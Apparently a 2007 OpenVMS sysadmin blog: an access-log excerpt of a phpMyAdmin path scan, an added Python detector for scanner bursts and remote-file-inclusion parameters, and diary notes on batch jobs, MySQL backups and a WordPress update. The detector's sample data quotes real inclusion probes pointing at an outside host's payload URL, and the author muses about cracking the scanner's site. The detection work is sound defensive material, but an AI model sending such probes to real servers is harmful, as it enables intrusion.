193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /web/phpMyAdmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /admin/pma/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /admin/phpmyadmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /admin/mysql/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /phpmyadmin2/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /mysqladmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /mysql-admin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /myadmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.0/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.0-pl1/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.3-pl1/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.3/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:59 +0100] "GET /phpMyAdmin-2.6.3-rc1/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:59 +0100] "GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0" 302 341

I wonder what HIS system would look like. That would be an easy site to crack!
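The three log excerpts above share two patterns worth picking out automatically: one client firing a burst of requests that all end in 404 or a redirect, and query strings whose parameter value is a full URL on somebody else's host (the classic remote-file-inclusion probe against PHP packages). The script below is an added example, not part of this entry or of the web server: it parses access-log lines in the common format shown above, flags clients with a burst of non-2xx responses inside a short window, and lists requests carrying a remote-URL parameter. The window and threshold are assumptions; the sample lines are copied from the logs above plus one constructed normal request.

```python
"""Pick scanner bursts and remote-URL parameters out of a web access log.

Added example, not the author's code: common-log-format parsing, a
sliding-window burst rule per client, and a query-parameter check.
Thresholds are assumptions chosen to fit the excerpts above.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: lines copied from the access logs above, plus one
# made-up ordinary request (192.0.2.10) so the rules have a negative case.
SAMPLE_ACCESS_LOG = """\
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:21 +0100] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868
216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_simpleboard/image_upload.php?sbp=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:43 +0100] "GET /index.php?page=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
193.164.131.46 - - [25/Feb/2007:11:49:52 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /NoService.html HTTP/1.0" 200 2135
193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /PMA/main.php HTTP/1.0" 302 341
192.0.2.10 - - [25/Feb/2007:12:00:00 +0100] "GET /index.html HTTP/1.1" 200 1234
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_line(line: str) -> Optional[dict]:
    """One common-log-format line -> dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def parse_log(text: str) -> List[dict]:
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def remote_include_params(target: str) -> List[Tuple[str, str]]:
    """Query parameters whose value is itself a URL on another host."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if v.lower().startswith(REMOTE_SCHEMES)]


def burst_clients(records: List[dict], window: timedelta = timedelta(seconds=10),
                  threshold: int = 5) -> Dict[str, int]:
    """Clients with at least `threshold` non-2xx responses inside any `window`.

    Returns host -> size of the densest window; sliding two indices over the
    sorted timestamps keeps this linear per client.
    """
    by_host: Dict[str, List[datetime]] = defaultdict(list)
    for r in records:
        if not 200 <= r["status"] < 300:
            by_host[r["host"]].append(r["ts"])
    hits: Dict[str, int] = {}
    for host, times in by_host.items():
        times.sort()
        best, lo = 0, 0
        for hi in range(len(times)):
            while times[hi] - times[lo] > window:
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= threshold:
            hits[host] = best
    return hits


def report(text: str) -> dict:
    recs = parse_log(text)
    rfi = [(r["host"], r["target"]) for r in recs if remote_include_params(r["target"])]
    return {"total": len(recs), "bursts": burst_clients(recs), "rfi": rfi}


if __name__ == "__main__":
    out = report(SAMPLE_ACCESS_LOG)
    print(f"{out['total']} requests parsed")
    print("burst clients:", out["bursts"])
    for host, target in out["rfi"]:
        print("remote-URL parameter from", host, "->", target)
```

On the sample, 69.13.158.140 is reported as a burst client (five 404s within three seconds), the three 216.73.96.220 requests are listed for their remote-URL parameters, and the constructed normal request trips neither rule. On a server like this one, where all those paths simply redirect or 404, the value of such a report is the list of source addresses to hand to the ISP, not any change needed on the box.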

08-Mar-2007

Some maintenance on system management procedures
needed to be done.

For some reason, the procedure that cycles the operator log and scans it for spam attempts hasn’t been working properly since the beginning of the week. That is: there has been no copy of operator log files to the operator web, and the spamlist hasn’t been updated. I just found that this was quite obvious since creation of new logfiles did not occur. The log of the job does not show an error, but new files were not created, and the current one was the one of last Monday.

I recall I had made slight changes last weekend, and the next run failed because the input file wasn’t found when the batch job started:
$ type scan_log.log.-2
Error opening primary input file SYS$INPUT
File not found
SYSTEM job terminated at 5-MAR-2007 00:00:00.10
$

so there was no job entry on the next day either.
I thought I hadn’t purged, but it seems I had. Well, no problem: submit it again – forgetting it needs to be run as a user that has OPER privilege enabled by default. My standard account has OPER priv – as an authorized privilege, not enabled by default. Hence, no REPLY… Weird that it didn’t show up in the log:
Starting new log.operator
$ define/user sys$command _opa0:
$ reply/enable
$ define/user sys$command _opa0:
$ reply/log ! new logfile
$ define/user sys$command _opa0:
$ reply/disable
$ wait 00:01 ! wait a minute
$ set nover

OPERATOR.LOG does not signal this either – obviously:
%%%%%%%%%%% OPCOM 4-MAR-2007 23:26:50.87 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 216.148.221.135 Port: 28690

%%%%%%%%%%% OPCOM 4-MAR-2007 23:39:44.59 %%%%%%%%%%%
Logfile time stamp

%%%%%%%%%%% OPCOM 5-MAR-2007 00:39:44.60 %%%%%%%%%%%
Logfile time stamp

%%%%%%%%%%% OPCOM 5-MAR-2007 01:04:04.41 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 156.153.255.213 Port: 33873

The problem is now solved – I hope. I ran the script – unaltered – with privs enabled, and the logfile has been cycled and scanned. So I altered the script to be sure it will be re-submitted under the right user now.
We’ll see tomorrow.
More typos
In the same log, it turns out that scanning for failed logins – at least, I suspect the problem to be there – has a typo as well. It does work; I saw the log has been updated, but I simply don’t like errors like this:
...
%BACKUP-S-CREATED, created WEB_DISK2:[private.ftp]tcpip$ftp_run.txt;77
%DCL-W-EXPSYN, invalid expression syntax - check operators and operands
Done
...

Tonight, it will run with verification enabled, so hopefully the error will show up in the log and I can do some repair. Luckily, this script is called by the daily log scanner and not submitted by itself, so any change will be effective immediately.
MySQL backup
doesn’t run well either in batch. The resulting SQL script ends:
/*!40000 ALTER TABLE `bbposts_text` DISABLE KEYS */;
LOCK TABLES `bbposts_text` WRITE;
%TYPE-F-WRITEERR, error writing SYS$OUTPUT:.;
-RMS-F-SYS, QIO system service request failed
-SYSTEM-F-EXQUOTA, process quota exceeded

Same problem as the log scanner: it doesn’t run under an account that is sufficiently privileged by default – so that has been changed as well, and the job re-submitted. One more to be checked tomorrow.

06-Mar-2007

WordPress update
has just been done – to version 2.0.9. As usual, no problems, once the right files were re-retrieved from backup. Anyway: the classes.zip in this version has been corrected, so it now runs the same version as can be downloaded from the WordPress.org site.
Version 2.1.2 has been downloaded and will be tested before it’s put into production. Glad I didn’t install it yet – the site has been hacked and a few files altered by the hacker. Time they get a VMS box 🙂
Update of VMS
has been postponed a few weeks; I need some more time to prepare the installation of the update. It’s not that important, so I decided I can take the “risk”.
Mail problems
that I found a few weeks ago: VMS Mail, or better: the standard SMTP, cannot handle the “numbered domains” we have over here: sending mail /TO=user@name.number.nl generates an error, and I tried that with Quintara as well. Today I got a mail that they’re working on their own SMTP engine to overcome limitations in the “official” software, and to enhance it with required facilities. But Quintara uses SWS, which I abandoned. It’s not a real problem, since that named domain will be dropped one of these days anyway.